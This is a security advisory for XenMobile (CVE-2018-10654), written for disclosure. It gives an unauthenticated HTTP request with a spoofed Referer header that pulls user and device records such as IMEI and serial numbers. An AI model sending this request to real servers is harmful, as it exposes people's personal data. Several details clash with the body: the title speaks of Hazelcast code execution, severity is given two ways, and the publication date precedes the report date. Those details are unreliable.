Advisory

XenMobile contains a vulnerable version of Hazelcast, remote code execution via object serialisation

Proof of concept

Data about users and devices, including email addresses and IMEI identifiers, can be obtained without authentication by making API calls:

    GET /zdm/rs/xdmServices/autoAction/execution/list HTTP/1.1
    Host: xenmobile.example.com
    Referer: https://xenmobile.example.com/zdm/cxf/xdmServices/login.jsp

Xen will return data which includes the following information about each user:

    actionData, activationDate, createdDate, deviceId, deviceImei, deviceSerial, id, model, osFamily, provisioningId, status, triggerData, userName

This is possible because XenMobile uses the Referer header to control access to the API. However, this value is fully in control of the attacker, so is an ineffective authentication mechanism.

Mitigation/further actions

  1. Explore whether it is possible to require effective authentication before accessing this type of information
  2. Remove public access to this service by moving it inside your network and configuring mobile devices to access it via a VPN or proxy that requires authentication
  3. Install an update rectifying this issue as soon as one is available

Advisory timeline

  1. 2018-03-28 – Reported to Citrix and acknowledged immediately
  2. 2018-05-21 – Issue reported fixed

CVSS

Base score 9.3
Attack vector Local
Attack complexity Low
Privileges required None
User interaction None
Scope Changed
Confidentiality High
Integrity High
Availability High

Metadata

  • Severity
    Critical (base score 9.3)
  • Discovered by
    Glyn Wintle
  • Severity
    High
  • Advisory ID
    dxw-2018-3590
  • CVE
    CVE-2018-10654
  • Component/package
    XenMobile
  • Version
    10.8.0 and older versions
  • Published
    2018-03-26

© 2022 Tradecraft Ltd. Tradecraft Ltd is a company registered in England & Wales, no. 10984430. Registered address 86-90 Paul Street, London, EC2A 4NE.

Privacy policy / Events code of conduct / Responsible disclosure